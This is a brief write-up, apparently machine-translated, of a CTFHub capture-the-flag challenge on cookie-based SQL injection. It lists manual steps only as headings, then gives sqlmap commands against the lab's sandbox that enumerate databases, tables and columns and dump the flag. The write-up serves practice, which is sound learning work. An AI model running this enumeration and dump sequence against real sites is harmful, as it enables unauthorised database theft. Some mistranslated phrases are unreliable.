ctfhub skill tree -sql inject injection -Cookie

Hand Note

Open drone

View Page Info

Find a cookie

Whether the test was injected into the cookie


Ethereal

Try to inject

Successfully query to the database name

Query table name

Query field name

Query Field Information

Successfully got flag

sqlmap

Query the database name

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs

Query data table name

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli --tables

Query field name

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy --columns

Query Field Information

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy -C pbsbpdhlmf --dump


Successfully got flag

Guess you like

Origin www.cnblogs.com/anweilx/p/12516632.html